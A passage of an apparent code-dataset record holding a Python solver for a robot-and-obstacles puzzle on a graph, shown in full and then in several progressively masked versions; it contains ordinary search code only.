        moves.append((res[0], res[-1], len(res) - 1, res))
    return moves


def move_robot(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if not node_from == r:
        raise RuntimeError('node_from is not robot ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    robot = node_to
    return obstacles, robot


def move_obstacle(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if node_from not in obstacles:
        raise RuntimeError('node_from is not obstacle ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    if node_to == robot:
        raise RuntimeError('node_to is robot' + node_to)
    obstacles.append(node_to)
    obstacles.remove(node_from)
    return obstacles, robot


def make_move(o, r, graph, node_from, node_to):
    if node_from is None:
        return o, r
    if r == node_from:
        return move_robot(o, r, graph, node_from, node_to)
    if node_from in o:
        return move_obstacle(o, r, graph, node_from, node_to)
    raise RuntimeError('Cant move from ' + node_from)


<|reserved_special_token_0|>


def is_hole(o, r, node):
    if node not in o:
        return True
    return False


def possible_robot_moves(o, r, graph):
    moves = []
    robot_node = r
    robot_neighbors = graph.adj[r]
    for neighbor in robot_neighbors:
        if is_hole(o, r, neighbor):
            moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
    return moves


def possible_obstacle_moves(o, r, graph, obstacle):
    obstacle_neighbors = graph.adj[obstacle]
    moves = []
    for neighbor in obstacle_neighbors:
        if is_hole(o, r, neighbor) and neighbor != r:
            moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
        elif neighbor != r:
            nh = find_nearest_hole(o, r, graph, neighbor)
            if len(nh) > 0:
                moves.extend(nh)
    return moves


def possible_obstacles_moves(o, r, graph):
    moves = []
    for obstacle in o:
        moves.extend(possible_obstacle_moves(o, r, graph, obstacle))
    return moves


def possible_moves(o, r, graph):
    moves = []
    moves.extend(possible_robot_moves(o, r, graph))
    moves.extend(possible_obstacles_moves(o, r, graph))
    return moves


def color(o, r, graph, node, target, start):
    if node in o and node == target:
        return 'c'
    if node in o:
        return 'r'
    if node == r:
        return 'b'
    if node == start:
        return 'y'
    if node == target:
        return 'g'
    return 'w'


def create_state(o, r):
    o.sort()
    return '-'.join(o) + ' ___ R = ' + r


def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
    shortest = nx.shortest_path(graph, robot, target)
    score = -len(shortest) - num_of_moves
    for obstacle in obstacles:
        if obstacle in shortest:
            score = score - 1
    return -score


def solve_heap(o, r, graph, t):
    round = 0
    visited = set([])
    queue = [(-1000, [], o, r)]
    while queue:
        score, moves, obstacles, robot = heap.heappop(queue)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                    return new_moves
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                heap.heappush(queue, (score, new_moves, newobstacles, newrobot))


def solve_brute_force(o, r, graph, t):
    num_of_solutions = 0
    all_solutions = []
    round = 0
    visited = set([])
    queue = [([], o, r)]
    while queue:
        moves, obstacles, robot = queue.pop(0)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    all_solutions.append(new_moves)
                round = round + 1
                if round % 100000 == 0:
                    print('Visited = ' + str(len(visited)))
                queue.append((new_moves, newobstacles, newrobot))
    print('Number of solutions: ' + str(len(all_solutions)))
    best = min(all_solutions, key=lambda x: len(x))
    return best
<|reserved_special_token_1|>
import heapq as heap
import networkx as nx
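
# Sliding-puzzle style solver: a robot travels across a graph whose nodes may be
# blocked by movable obstacles. A move is a (node_from, node_to, cost, path) tuple
# describing either a robot step or an obstacle relocation.
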
def remove_jumps(moves):
    res = []
    for move in moves:
        if move[2] > 1:
            move[3].reverse()
            res.extend(make_moves_from_path(move[3]))
        else:
            res.append(move)
    return res


def make_moves_from_path(path):
    moves = []
    p = path[:]
    for i in range(len(p) - 1):
        moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))
    return moves
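

# Breadth-first search from `start` across obstacle-occupied nodes; for each free
# node reached at the edge of the cluster, emit a candidate move
# (start, hole, distance, path).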
def find_nearest_hole(o, r, graph, start):
    visited, queue = [], [(start, [start])]
    results = []
    while queue:
        node, search_path = queue.pop(0)
        if node not in visited:
            visited.append(node)
            adjacent = graph.adj[node]
            for neighbor in adjacent:
                if neighbor in o:
                    if neighbor not in visited:
                        queue.append((neighbor, search_path + [neighbor]))
                elif neighbor != r:
                    results.append(search_path + [neighbor])
    moves = []
    for res in results:
        moves.append((res[0], res[-1], len(res) - 1, res))
    return moves


def move_robot(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if not node_from == r:
        raise RuntimeError('node_from is not robot ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    robot = node_to
    return obstacles, robot


def move_obstacle(o, r, graph, node_from, node_to):
    obstacles = o[:]
    robot = r
    if node_from not in obstacles:
        raise RuntimeError('node_from is not obstacle ' + node_from)
    if node_to in obstacles:
        raise RuntimeError('node_to is obstacle ' + node_to)
    if node_to == robot:
        raise RuntimeError('node_to is robot' + node_to)
    obstacles.append(node_to)
    obstacles.remove(node_from)
    return obstacles, robot


def make_move(o, r, graph, node_from, node_to):
    if node_from is None:
        return o, r
    if r == node_from:
        return move_robot(o, r, graph, node_from, node_to)
    if node_from in o:
        return move_obstacle(o, r, graph, node_from, node_to)
    raise RuntimeError('Cant move from ' + node_from)


def make_moves(o, r, graph, moves):
    obstacles = o[:]
    robot = r
    for move in moves:
        obstacles, robot = make_move(obstacles, robot, graph, move[0], move[1])
    return obstacles, robot


def is_hole(o, r, node):
    if node not in o:
        return True
    return False


def possible_robot_moves(o, r, graph):
    moves = []
    robot_node = r
    robot_neighbors = graph.adj[r]
    for neighbor in robot_neighbors:
        if is_hole(o, r, neighbor):
            moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
    return moves


def possible_obstacle_moves(o, r, graph, obstacle):
    obstacle_neighbors = graph.adj[obstacle]
    moves = []
    for neighbor in obstacle_neighbors:
        if is_hole(o, r, neighbor) and neighbor != r:
            moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
        elif neighbor != r:
            nh = find_nearest_hole(o, r, graph, neighbor)
            if len(nh) > 0:
                moves.extend(nh)
    return moves


def possible_obstacles_moves(o, r, graph):
    moves = []
    for obstacle in o:
        moves.extend(possible_obstacle_moves(o, r, graph, obstacle))
    return moves


def possible_moves(o, r, graph):
    moves = []
    moves.extend(possible_robot_moves(o, r, graph))
    moves.extend(possible_obstacles_moves(o, r, graph))
    return moves


def color(o, r, graph, node, target, start):
    if node in o and node == target:
        return 'c'
    if node in o:
        return 'r'
    if node == r:
        return 'b'
    if node == start:
        return 'y'
    if node == target:
        return 'g'
    return 'w'


def create_state(o, r):
    o.sort()
    return '-'.join(o) + ' ___ R = ' + r

#__________________________________________________________________________________
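
# Search priority: length of the robot's shortest path to the target, plus the
# number of moves made so far, plus one for each obstacle sitting on that path.
# heapq pops the smallest value first, so cheaper-looking states are expanded first.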
def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
    shortest = nx.shortest_path(graph, robot, target)
    score = -len(shortest) - num_of_moves
    for obstacle in obstacles:
        if obstacle in shortest:
            score = score - 1
    return -score
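

# Best-first search over (obstacles, robot) states, ordered by fitness_fun_heap;
# returns the first move sequence found that puts the robot on the target node t.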
def solve_heap(o, r, graph, t):
    round = 0
    visited = set([])
    queue = [(-1000, [], o, r)]
    while queue:
        score, moves, obstacles, robot = heap.heappop(queue)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
                    return new_moves
                round = round + 1
                if round % 100000 == 0:
                    print("Visited = " + str(len(visited)))
                heap.heappush(queue, (score, new_moves, newobstacles, newrobot))
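

# Exhaustive breadth-first enumeration of all reachable states; collects every
# move sequence that reaches the target and returns the shortest one.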
def solve_brute_force(o, r, graph, t):
    num_of_solutions = 0
    all_solutions = []
    round = 0
    visited = set([])
    queue = [([], o, r)]
    while queue:
        moves, obstacles, robot = queue.pop(0)
        obstacles.sort()
        st = '#'.join(obstacles), robot
        if st not in visited:
            visited.add(st)
            pm = possible_moves(obstacles, robot, graph)
            for move in pm:
                new_moves = moves[:]
                new_moves.append(move)
                newobstacles, newrobot = make_moves(obstacles, robot, graph, [move])
                if t == newrobot:
                    all_solutions.append(new_moves)
                round = round + 1
                if round % 100000 == 0:
                    print("Visited = " + str(len(visited)))
                queue.append((new_moves, newobstacles, newrobot))
    print('Number of solutions: ' + str(len(all_solutions)))
    best = min(all_solutions, key=lambda x: len(x))
    return best
|
flexible
|
{
"blob_id": "800edfc61635564abf8297c4f33c59d48cc99960",
"index": 4058,
"step-1": "<mask token>\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\n<mask token>\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\n<mask token>\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, 
t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-3": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\n<mask token>\n\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph, robot, target)\n score = -len(shortest) - num_of_moves\n for obstacle in obstacles:\n if obstacle in shortest:\n score = score - 1\n return -score\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n 
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-4": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\ndef make_move(o, r, graph, node_from, node_to):\n if node_from == None:\n return o, r\n if r == node_from:\n return move_robot(o, r, graph, node_from, node_to)\n if node_from in o:\n return move_obstacle(o, r, graph, node_from, node_to)\n raise RuntimeError('Cant move from ' + node_from)\n\n\n<mask token>\n\n\ndef is_hole(o, r, node):\n if node not in o:\n return True\n return False\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\ndef possible_obstacles_moves(o, r, graph):\n moves = []\n for obstacle in o:\n moves.extend(possible_obstacle_moves(o, r, graph, obstacle))\n return moves\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\ndef create_state(o, r):\n o.sort()\n return '-'.join(o) + ' ___ R = ' + r\n\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph, robot, target)\n score = -len(shortest) - num_of_moves\n for obstacle in obstacles:\n if obstacle in 
shortest:\n score = score - 1\n return -score\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-5": "import heapq as heap\nimport networkx as nx\nimport copy\nimport random\ndef remove_jumps(moves):\n\n res = []\n\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n\n return res\n\n\ndef make_moves_from_path(path):\n\n moves = []\n p = path[:]\n\n for i in range(len(p)-1):\n moves.append((p[i+1], p[i], 1, [p[i+1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o,r,graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n\n while queue:\n (node, search_path) = queue.pop(0)\n\n if node not in visited:\n visited.append(node)\n\n adjacent = graph.adj[node]\n\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n else:\n if neighbor != r:\n results.append(search_path + [neighbor])\n\n moves = []\n for res in results:\n\n moves.append((res[0], res[-1], len(res)-1, res))\n return moves\n\ndef move_robot(o,r,graph,node_from,node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return (obstacles,robot)\n\ndef move_obstacle(o,r,graph,node_from,node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n\n obstacles.append(node_to)\n obstacles.remove(node_from)\n\n return(obstacles,robot)\n\ndef make_move(o,r,graph,node_from,node_to):\n\n if node_from == None:\n return (o, r)\n\n if( r == node_from):\n return move_robot(o,r,graph,node_from,node_to)\n if ( node_from in o):\n return move_obstacle(o,r,graph,node_from,node_to)\n\n raise RuntimeError('Cant move from ' + node_from)\n\ndef make_moves(o,r,graph,moves):\n obstacles= o[:]\n robot = r\n for move in moves:\n obstacles,robot = make_move(obstacles,robot,graph,move[0],move[1])\n return (obstacles,robot)\n\ndef is_hole(o, r, node):\n if (node not in o):\n return True\n return False\n\ndef possible_robot_moves(o, r, graph):\n moves=[]\n robot_node = r\n robot_neighbors = graph.adj[r]\n\n for neighbor in robot_neighbors:\n if is_hole(o,r,neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\ndef possible_obstacle_moves(o,r,graph,obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n\n for neighbor in obstacle_neighbors:\n if is_hole(o,r,neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n else:\n if neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o,r,graph, neighbor))\n\n return moves\n\ndef possible_obstacles_moves(o,r,graph):\n moves = []\n for obstacle in o:\n moves.extend(possible_obstacle_moves(o,r,graph,obstacle))\n return moves\n\ndef possible_moves(o,r,graph):\n moves = []\n moves.extend(possible_robot_moves(o,r,graph))\n moves.extend(possible_obstacles_moves(o,r,graph))\n return moves\n\n\ndef color(o,r,graph,node,target,start):\n if (node in o and node == target):\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\ndef create_state(o, r):\n\n o.sort()\n return '-'.join(o) + ' ___ R = ' + 
